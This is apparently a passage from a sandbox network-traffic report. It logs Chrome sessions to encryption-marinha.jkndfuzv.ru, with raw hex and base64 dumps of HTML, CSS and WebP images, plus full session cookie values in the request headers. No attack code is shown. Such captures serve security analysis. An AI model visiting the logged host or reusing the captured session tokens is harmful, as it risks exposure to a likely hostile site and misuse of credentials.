                                                                  2025-03-14 11:31:01 UTC1369INData Raw: 62 47 51 37 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 48 52 6c 65 48 51 74 64 48 4a 68 62 6e 4e 6d 62 33 4a 74 4f 69 42 31 63 48 42 6c 63 6d 4e 68 63 32 55 37 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 47 78 6c 64 48 52 6c 63 69 31 7a 63 47 46 6a 61 57 35 6e 4f 69 41 79 63 48 67 37 43 69 41 67 49 43 41 67 49 43 41 67 66 51 6f 67 49 43 41 67 49 43 41 67 49 47 35 68 64 69 42 68 4f 6d 68 76 64 6d 56 79 49 48 73 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 59 32 39 73 62 33 49 36 49 43 4e 6d 5a 6d 5a 6d 5a 6d 59 37 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 48 52 6c 65 48 51 74 5a 47 56 6a 62 33 4a 68 64 47 6c 76 62 6a 6f 67 64 57 35 6b 5a 58 4a 73 61 57 35 6c 4f 77 6f 67 49 43 41 67 49 43 41 67 49 48 30 4b 49 43 41 67 49 43 41
                                                                  Data Ascii: bGQ7CiAgICAgICAgICAgIHRleHQtdHJhbnNmb3JtOiB1cHBlcmNhc2U7CiAgICAgICAgICAgIGxldHRlci1zcGFjaW5nOiAycHg7CiAgICAgICAgfQogICAgICAgIG5hdiBhOmhvdmVyIHsKICAgICAgICAgICAgY29sb3I6ICNmZmZmZmY7CiAgICAgICAgICAgIHRleHQtZGVjb3JhdGlvbjogdW5kZXJsaW5lOwogICAgICAgIH0KICAgICA
                                                                  2025-03-14 11:31:01 UTC894INData Raw: 43 41 67 49 43 41 67 49 43 41 67 49 48 52 79 59 57 35 7a 61 58 52 70 62 32 34 36 49 48 52 79 59 57 35 7a 5a 6d 39 79 62 53 41 77 4c 6a 4e 7a 49 47 56 68 63 32 55 73 49 47 4a 76 65 43 31 7a 61 47 46 6b 62 33 63 67 4d 43 34 7a 63 79 42 6c 59 58 4e 6c 4f 77 6f 67 49 43 41 67 49 43 41 67 49 48 30 4b 49 43 41 67 49 43 41 67 49 43 41 75 5a 6d 56 68 64 48 56 79 5a 54 70 6f 62 33 5a 6c 63 69 42 37 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 48 52 79 59 57 35 7a 5a 6d 39 79 62 54 6f 67 64 48 4a 68 62 6e 4e 73 59 58 52 6c 57 53 67 74 4d 54 42 77 65 43 6b 37 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 47 4a 76 65 43 31 7a 61 47 46 6b 62 33 63 36 49 44 41 67 4f 48 42 34 49 44 49 30 63 48 67 67 63 6d 64 69 59 53 67 79 4d 7a 4d 73 49 44 59 35 4c 43 41 35
                                                                  Data Ascii: CAgICAgICAgIHRyYW5zaXRpb246IHRyYW5zZm9ybSAwLjNzIGVhc2UsIGJveC1zaGFkb3cgMC4zcyBlYXNlOwogICAgICAgIH0KICAgICAgICAuZmVhdHVyZTpob3ZlciB7CiAgICAgICAgICAgIHRyYW5zZm9ybTogdHJhbnNsYXRlWSgtMTBweCk7CiAgICAgICAgICAgIGJveC1zaGFkb3c6IDAgOHB4IDI0cHggcmdiYSgyMzMsIDY5LCA5
                                                                  2025-03-14 11:31:01 UTC1369INData Raw: 64 30 64 0d 0a 54 42 77 65 44 73 4b 49 43 41 67 49 43 41 67 49 43 42 39 43 69 41 67 49 43 41 67 49 43 41 67 5a 6d 39 76 64 47 56 79 49 48 41 67 65 77 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 74 59 58 4a 6e 61 57 34 36 49 44 41 37 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 47 4e 76 62 47 39 79 4f 69 41 6a 5a 54 6b 30 4e 54 59 77 4f 77 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 6d 62 32 35 30 4c 58 4e 70 65 6d 55 36 49 44 45 30 63 48 67 37 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 48 52 6c 65 48 51 74 64 48 4a 68 62 6e 4e 6d 62 33 4a 74 4f 69 42 31 63 48 42 6c 63 6d 4e 68 63 32 55 37 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 47 78 6c 64 48 52 6c 63 69 31 7a 63 47 46 6a 61 57 35 6e 4f 69 41 79 63 48 67 37 43 69 41
                                                                  Data Ascii: d0dTBweDsKICAgICAgICB9CiAgICAgICAgZm9vdGVyIHAgewogICAgICAgICAgICBtYXJnaW46IDA7CiAgICAgICAgICAgIGNvbG9yOiAjZTk0NTYwOwogICAgICAgICAgICBmb250LXNpemU6IDE0cHg7CiAgICAgICAgICAgIHRleHQtdHJhbnNmb3JtOiB1cHBlcmNhc2U7CiAgICAgICAgICAgIGxldHRlci1zcGFjaW5nOiAycHg7CiA
                                                                  2025-03-14 11:31:01 UTC1369INData Raw: 6d 56 68 64 48 56 79 5a 53 49 2b 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 50 47 67 7a 50 6c 4a 68 65 53 42 55 63 6d 46 6a 61 57 35 6e 50 43 39 6f 4d 7a 34 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 38 63 44 35 53 5a 57 46 73 4c 58 52 70 62 57 55 67 63 6d 46 35 49 48 52 79 59 57 4e 70 62 6d 63 67 5a 6d 39 79 49 47 78 70 5a 6d 56 73 61 57 74 6c 49 47 78 70 5a 32 68 30 61 57 35 6e 4c 43 42 7a 61 47 46 6b 62 33 64 7a 4c 43 42 68 62 6d 51 67 63 6d 56 6d 62 47 56 6a 64 47 6c 76 62 6e 4d 75 50 43 39 77 50 67 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 50 43 39 6b 61 58 59 2b 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 38 5a 47 6c 32
                                                                  Data Ascii: mVhdHVyZSI+CiAgICAgICAgICAgICAgICAgICAgPGgzPlJheSBUcmFjaW5nPC9oMz4KICAgICAgICAgICAgICAgICAgICA8cD5SZWFsLXRpbWUgcmF5IHRyYWNpbmcgZm9yIGxpZmVsaWtlIGxpZ2h0aW5nLCBzaGFkb3dzLCBhbmQgcmVmbGVjdGlvbnMuPC9wPgogICAgICAgICAgICAgICAgPC9kaXY+CiAgICAgICAgICAgICAgICA8ZGl2
                                                                  2025-03-14 11:31:01 UTC610INData Raw: 35 7a 64 57 31 77 64 47 6c 76 62 6a 6f 38 4c 33 4e 30 63 6d 39 75 5a 7a 34 67 4d 7a 55 77 56 7a 77 76 62 47 6b 2b 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 44 77 76 64 57 77 2b 43 69 41 67 49 43 41 67 49 43 41 67 50 43 39 7a 5a 57 4e 30 61 57 39 75 50 67 6f 67 49 43 41 67 49 43 41 67 49 44 78 7a 5a 57 4e 30 61 57 39 75 49 47 6c 6b 50 53 4a 6a 62 32 35 30 59 57 4e 30 49 69 42 6a 62 47 46 7a 63 7a 30 69 63 32 56 6a 64 47 6c 76 62 69 49 2b 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 44 78 6f 4d 6a 35 44 62 32 35 30 59 57 4e 30 49 46 56 7a 50 43 39 6f 4d 6a 34 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 50 48 41 2b 53 47 46 32 5a 53 42 78 64 57 56 7a 64 47 6c 76 62 6e 4d 67 62 33 49 67 62 6d 56 6c 5a 43 42 7a 64 58 42 77 62 33 4a 30 50
                                                                  Data Ascii: 5zdW1wdGlvbjo8L3N0cm9uZz4gMzUwVzwvbGk+CiAgICAgICAgICAgIDwvdWw+CiAgICAgICAgPC9zZWN0aW9uPgogICAgICAgIDxzZWN0aW9uIGlkPSJjb250YWN0IiBjbGFzcz0ic2VjdGlvbiI+CiAgICAgICAgICAgIDxoMj5Db250YWN0IFVzPC9oMj4KICAgICAgICAgICAgPHA+SGF2ZSBxdWVzdGlvbnMgb3IgbmVlZCBzdXBwb3J0P
                                                                  2025-03-14 11:31:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  30192.168.2.449756104.21.43.1754435628C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-03-14 11:31:01 UTC1473OUTGET /ijKWEY7gRXQm1JNCLSnYvcXyv9pGf253dTVw89gLm7vwI92mhs7QBmbAm2yz230 HTTP/1.1
                                                                  Host: encryption-marinha.jkndfuzv.ru
                                                                  Connection: keep-alive
                                                                  sec-ch-ua-platform: "Windows"
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                  sec-ch-ua-mobile: ?0
                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: image
                                                                  Referer: https://encryption-marinha.jkndfuzv.ru/tqrmmkqnkybhgrcpajlvlmkvressy5l3xb609h7xeqsb767nl?YTUSIOUTJWFKEHXUXRYQVBSNX
                                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IkZyZmxmV1dGTDVYS0xEUnVGYmpibmc9PSIsInZhbHVlIjoialhaNzhMdlBEYW91OHBKb2NoWXJlZ2ZXbXY2RW1DN3IxMDJhUHZIalk4dG8wVVpVc3BOL1AwMGZCdkFwV00rNUVCWmJvTzdJRXd2dVZvMzZtSjlQUnJUcUxlNHpVZUdRaDM4d3picnd1VldPYnNiY0wxYzY5ZDdrVExzZFBoSDMiLCJtYWMiOiI3ZjdmZWUyYzQ1Y2JiMzQ2N2I0YzQ0N2NlNzE0NmJjZTYyN2U0ZWM0NzQzNTFjZjYxMWNkMzc0MzNmMjMwMWM0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkJkNDE5K3ZRZFFNd01uMmFseXc5b3c9PSIsInZhbHVlIjoiQllDbm5YV0JrdE5ZU1c5eitnTTg2dEd4Y3JEc1lXakhkQWF0TFVCS01EczlpTzZoOVJHRlBmN3c5bUxOYXZMd09kUjZEZXpBZFYxNGpOZDRaSWU3eHA3WTRjUm1zZlAvaEtGdjZHcmFDdFk3S01lV01VMVVCZ3JZRS9CVitMMFYiLCJtYWMiOiJkOGMxZDY5MzczN2Q0OWI2NTgyYjMyNTE1MmMzMmM3ZTk1ZWUyNjBlYTA0OWU2NTUxYTMyNDNkZWMwYjJjNTFiIiwidGFnIjoiIn0%3D
                                                                  2025-03-14 11:31:01 UTC1075INHTTP/1.1 200 OK
                                                                  Date: Fri, 14 Mar 2025 11:31:01 GMT
                                                                  Content-Type: image/webp
                                                                  Content-Length: 1298
                                                                  Connection: close
                                                                  Content-Disposition: inline; filename="ijKWEY7gRXQm1JNCLSnYvcXyv9pGf253dTVw89gLm7vwI92mhs7QBmbAm2yz230"
                                                                  cf-cache-status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2BAax33ZMjTAfz5lGBuzoM4cNIUEVKCzmFS6pGKDKofffbgDdNaNZrzA40Zf5TuPQux6%2BAmSMJRsmg0AoAGl%2ByiUwNmGIAGHFDCTnfqOjKFdjdEJxDEnhSDullmZ"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=6337&min_rtt=4355&rtt_var=2591&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2381&delivery_rate=518195&cwnd=248&unsent_bytes=0&cid=6b26c28ae456254f&ts=101&x=0"
                                                                  Server: cloudflare
                                                                  CF-RAY: 9203713e4bcdf02b-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1642&min_rtt=1639&rtt_var=622&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2045&delivery_rate=1748502&cwnd=124&unsent_bytes=0&cid=c62d40838cfcac2d&ts=329&x=0"
                                                                  2025-03-14 11:31:01 UTC1298INData Raw: 52 49 46 46 0a 05 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 30 00 00 00 6b 00 00 17 00 00 49 43 43 50 c8 01 00 00 00 00 01 c8 00 00 00 00 04 30 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 e0 00 01 00 01 00 00 00 00 00 00 61 63 73 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 f6 d6 00 01 00 00 00 00 d3 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 64 65 73 63 00 00 00 f0 00 00 00 24 72 58 59 5a 00 00 01 14 00 00 00 14 67 58 59 5a 00 00 01 28 00 00 00 14 62 58 59 5a 00 00 01 3c 00 00 00 14 77 74 70 74 00 00 01 50 00 00 00 14 72 54 52 43 00 00 01 64 00 00 00 28 67 54 52 43 00 00 01 64 00 00 00 28 62
                                                                  Data Ascii: RIFFWEBPVP8X0kICCP0mntrRGB XYZ acsp-desc$rXYZgXYZ(bXYZ<wtptPrTRCd(gTRCd(b


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  31192.168.2.449760104.21.43.1754435628C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-03-14 11:31:02 UTC1455OUTGET /uvzWbq53F9oUBbZ6Pvast8uNBxSwpjYvpcHgRi4X34130 HTTP/1.1
                                                                  Host: encryption-marinha.jkndfuzv.ru
                                                                  Connection: keep-alive
                                                                  sec-ch-ua-platform: "Windows"
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                  sec-ch-ua-mobile: ?0
                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: image
                                                                  Referer: https://encryption-marinha.jkndfuzv.ru/tqrmmkqnkybhgrcpajlvlmkvressy5l3xb609h7xeqsb767nl?YTUSIOUTJWFKEHXUXRYQVBSNX
                                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IkdseWYxdzJpWGVTMEJydy94MkFEYUE9PSIsInZhbHVlIjoiVDlBTUxyMTdQRGFWdzZhSXNvKzBKUjM5WVFPZ3hER3crN2pEcjFiVUZCL0VSaENmUkxGMEVJNDhQeVAvOVpIS2RRdjRPOVE3OXcraFNBbmluRFA4VWFlZGdZVmhRVW5lelFlQXEzSFQrTjdhSWhmTjhqREQ4OVZmTDNVNlBsRVoiLCJtYWMiOiJkODczY2M4ZGQ1YWE1NjcyNmMxZTFiYmUyYmZhZmY4YTg3ZGM5NjMxZDNlNzQwMTgwYTZmM2Q4ZDQ1MmU1OWUyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImhtQlplWC81bVVjcEVwSHdEN1hDOUE9PSIsInZhbHVlIjoiOFZGZEdmSDh1NDhuYWprQU8zdFJEd3NQU0FyZExXbTBHUnV1UllEUUVIMHFYOEh0MW1VN2ZEV2tjVnU3Q3JKbEpxRkcvMUpmbjFiZndYR1dXanBKMjFIa2lXNlFvUGF5OVRkV2loL1BLOHNHdStpNU9nS3EzdVNhbDVhRUttby8iLCJtYWMiOiIxMzRjZjM5MWYzMGNmMzBiNzJmOGE4MWNhNTJmYWQwN2Q4NDc3M2U0MDMyOTIyZGYyMzM0YmYzYTdhOWVjOTdiIiwidGFnIjoiIn0%3D
                                                                  2025-03-14 11:31:02 UTC1067INHTTP/1.1 200 OK
                                                                  Date: Fri, 14 Mar 2025 11:31:02 GMT
                                                                  Content-Type: image/webp
                                                                  Content-Length: 644
                                                                  Connection: close
                                                                  Content-Disposition: inline; filename="uvzWbq53F9oUBbZ6Pvast8uNBxSwpjYvpcHgRi4X34130"
                                                                  cf-cache-status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y%2B%2ByK5a62oL1b59ycluk7jbhSbpevzzXOMTCWshD%2FLQEiaA2n%2FA4JCv%2BEyag6Qve6tgdsf5OWsHWT6miZa%2F4sZmb4J%2B8tpo%2BCvkbRoHNi1o5jEbCw23lMIvQwz7W"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4235&min_rtt=4233&rtt_var=1592&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2364&delivery_rate=669960&cwnd=251&unsent_bytes=0&cid=ea32ce7eaa4e3841&ts=109&x=0"
                                                                  Server: cloudflare
                                                                  CF-RAY: 920371445b33c333-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1491&min_rtt=1489&rtt_var=564&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2027&delivery_rate=1932495&cwnd=84&unsent_bytes=0&cid=fc9ae0ea6cde30cc&ts=389&x=0"
                                                                  2025-03-14 11:31:02 UTC302INData Raw: 52 49 46 46 7c 02 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 30 00 00 00 17 00 00 17 00 00 49 43 43 50 c8 01 00 00 00 00 01 c8 00 00 00 00 04 30 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 e0 00 01 00 01 00 00 00 00 00 00 61 63 73 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 f6 d6 00 01 00 00 00 00 d3 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 64 65 73 63 00 00 00 f0 00 00 00 24 72 58 59 5a 00 00 01 14 00 00 00 14 67 58 59 5a 00 00 01 28 00 00 00 14 62 58 59 5a 00 00 01 3c 00 00 00 14 77 74 70 74 00 00 01 50 00 00 00 14 72 54 52 43 00 00 01 64 00 00 00 28 67 54 52 43 00 00 01 64 00 00 00 28 62
                                                                  Data Ascii: RIFF|WEBPVP8X0ICCP0mntrRGB XYZ acsp-desc$rXYZgXYZ(bXYZ<wtptPrTRCd(gTRCd(b
                                                                  2025-03-14 11:31:02 UTC342INData Raw: 00 00 00 1c 00 73 00 52 00 47 00 42 58 59 5a 20 00 00 00 00 00 00 6f a2 00 00 38 f5 00 00 03 90 58 59 5a 20 00 00 00 00 00 00 62 99 00 00 b7 85 00 00 18 da 58 59 5a 20 00 00 00 00 00 00 24 a0 00 00 0f 84 00 00 b6 cf 58 59 5a 20 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 70 61 72 61 00 00 00 00 00 04 00 00 00 02 66 66 00 00 f2 a7 00 00 0d 59 00 00 13 d0 00 00 0a 5b 00 00 00 00 00 00 00 00 6d 6c 75 63 00 00 00 00 00 00 00 01 00 00 00 0c 65 6e 55 53 00 00 00 20 00 00 00 1c 00 47 00 6f 00 6f 00 67 00 6c 00 65 00 20 00 49 00 6e 00 63 00 2e 00 20 00 32 00 30 00 31 00 36 41 4c 50 48 4b 00 00 00 01 57 60 24 92 d4 f4 9f 7a f9 80 22 0d 59 88 88 50 7d 30 3b 07 50 45 b2 92 47 0b 12 68 00 c6 06 8c 39 88 40 0a 8d 60 03 93 32 ef 8b 00 11 fd 9f 00 f4 3d 99 54 e6 0a
                                                                  Data Ascii: sRGBXYZ o8XYZ bXYZ $XYZ -paraffY[mlucenUS Google Inc. 2016ALPHKW`$z"YP}0;PEGh9@`2=T


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  32192.168.2.449761104.21.43.1754435628C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-03-14 11:31:02 UTC1456OUTGET /oplZe0JQgDwLxmPPrn3AcmPOKBS4ghvickIYGe8gd45140 HTTP/1.1
                                                                  Host: encryption-marinha.jkndfuzv.ru
                                                                  Connection: keep-alive
                                                                  sec-ch-ua-platform: "Windows"
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                  sec-ch-ua-mobile: ?0
                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: image
                                                                  Referer: https://encryption-marinha.jkndfuzv.ru/tqrmmkqnkybhgrcpajlvlmkvressy5l3xb609h7xeqsb767nl?YTUSIOUTJWFKEHXUXRYQVBSNX
                                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IkdseWYxdzJpWGVTMEJydy94MkFEYUE9PSIsInZhbHVlIjoiVDlBTUxyMTdQRGFWdzZhSXNvKzBKUjM5WVFPZ3hER3crN2pEcjFiVUZCL0VSaENmUkxGMEVJNDhQeVAvOVpIS2RRdjRPOVE3OXcraFNBbmluRFA4VWFlZGdZVmhRVW5lelFlQXEzSFQrTjdhSWhmTjhqREQ4OVZmTDNVNlBsRVoiLCJtYWMiOiJkODczY2M4ZGQ1YWE1NjcyNmMxZTFiYmUyYmZhZmY4YTg3ZGM5NjMxZDNlNzQwMTgwYTZmM2Q4ZDQ1MmU1OWUyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImhtQlplWC81bVVjcEVwSHdEN1hDOUE9PSIsInZhbHVlIjoiOFZGZEdmSDh1NDhuYWprQU8zdFJEd3NQU0FyZExXbTBHUnV1UllEUUVIMHFYOEh0MW1VN2ZEV2tjVnU3Q3JKbEpxRkcvMUpmbjFiZndYR1dXanBKMjFIa2lXNlFvUGF5OVRkV2loL1BLOHNHdStpNU9nS3EzdVNhbDVhRUttby8iLCJtYWMiOiIxMzRjZjM5MWYzMGNmMzBiNzJmOGE4MWNhNTJmYWQwN2Q4NDc3M2U0MDMyOTIyZGYyMzM0YmYzYTdhOWVjOTdiIiwidGFnIjoiIn0%3D
                                                                  2025-03-14 11:31:02 UTC1054INHTTP/1.1 200 OK
                                                                  Date: Fri, 14 Mar 2025 11:31:02 GMT
                                                                  Content-Type: image/webp
                                                                  Content-Length: 892
                                                                  Connection: close
                                                                  Content-Disposition: inline; filename="oplZe0JQgDwLxmPPrn3AcmPOKBS4ghvickIYGe8gd45140"
                                                                  cf-cache-status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qzVsy12FB51fMYd2NqEAm12UQXG59RQZFCyflP63b2XeAPkPcWOdiA2ugioEePR8omJOEY%2BK2XJo6u1VAytKmacWApSFxttMwpHjsP2asUlZt8fLjt63Tm8zdBJV"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4978&min_rtt=4968&rtt_var=1417&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2365&delivery_rate=565640&cwnd=251&unsent_bytes=0&cid=5b8e763373f710f2&ts=98&x=0"
                                                                  Server: cloudflare
                                                                  CF-RAY: 920371446b0b4273-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1667&min_rtt=1661&rtt_var=635&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2028&delivery_rate=1708601&cwnd=201&unsent_bytes=0&cid=f8ed7277602a201d&ts=314&x=0"
                                                                  2025-03-14 11:31:02 UTC315INData Raw: 52 49 46 46 74 03 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 30 00 00 00 2f 00 00 2f 00 00 49 43 43 50 c8 01 00 00 00 00 01 c8 00 00 00 00 04 30 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 e0 00 01 00 01 00 00 00 00 00 00 61 63 73 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 f6 d6 00 01 00 00 00 00 d3 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 64 65 73 63 00 00 00 f0 00 00 00 24 72 58 59 5a 00 00 01 14 00 00 00 14 67 58 59 5a 00 00 01 28 00 00 00 14 62 58 59 5a 00 00 01 3c 00 00 00 14 77 74 70 74 00 00 01 50 00 00 00 14 72 54 52 43 00 00 01 64 00 00 00 28 67 54 52 43 00 00 01 64 00 00 00 28 62
                                                                  Data Ascii: RIFFtWEBPVP8X0//ICCP0mntrRGB XYZ acsp-desc$rXYZgXYZ(bXYZ<wtptPrTRCd(gTRCd(b
                                                                  2025-03-14 11:31:02 UTC577INData Raw: 59 5a 20 00 00 00 00 00 00 6f a2 00 00 38 f5 00 00 03 90 58 59 5a 20 00 00 00 00 00 00 62 99 00 00 b7 85 00 00 18 da 58 59 5a 20 00 00 00 00 00 00 24 a0 00 00 0f 84 00 00 b6 cf 58 59 5a 20 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 70 61 72 61 00 00 00 00 00 04 00 00 00 02 66 66 00 00 f2 a7 00 00 0d 59 00 00 13 d0 00 00 0a 5b 00 00 00 00 00 00 00 00 6d 6c 75 63 00 00 00 00 00 00 00 01 00 00 00 0c 65 6e 55 53 00 00 00 20 00 00 00 1c 00 47 00 6f 00 6f 00 67 00 6c 00 65 00 20 00 49 00 6e 00 63 00 2e 00 20 00 32 00 30 00 31 00 36 41 4c 50 48 3d 01 00 00 0d 80 96 6d 5b dd e6 9d 83 48 c0 41 bf 29 18 55 10 a2 80 d6 41 a3 a0 43 01 75 40 ab 20 89 82 11 07 4c c1 90 80 83 9e 0b 1f 3b ff 8b 08 05 92 24 33 7b 32 7b 2e f0 09 fc 33 a4 a1 56 36 08 69 de 57 c2 46 df
                                                                  Data Ascii: YZ o8XYZ bXYZ $XYZ -paraffY[mlucenUS Google Inc. 2016ALPH=m[HA)UACu@ L;$3{2{.3V6iWF


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  33192.168.2.449762104.21.43.1754435628C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-03-14 11:31:02 UTC1474OUTGET /efAlkLzZXEwNsgINX7w1qxrgFMBnoYa5WVYJijrAmeuDXpDcVRZAjYpFJOZ90150 HTTP/1.1
                                                                  Host: encryption-marinha.jkndfuzv.ru
                                                                  Connection: keep-alive
                                                                  sec-ch-ua-platform: "Windows"
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                  sec-ch-ua-mobile: ?0
                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: image
                                                                  Referer: https://encryption-marinha.jkndfuzv.ru/tqrmmkqnkybhgrcpajlvlmkvressy5l3xb609h7xeqsb767nl?YTUSIOUTJWFKEHXUXRYQVBSNX
                                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                                  Accept-Language: en-US,en;q=0.9
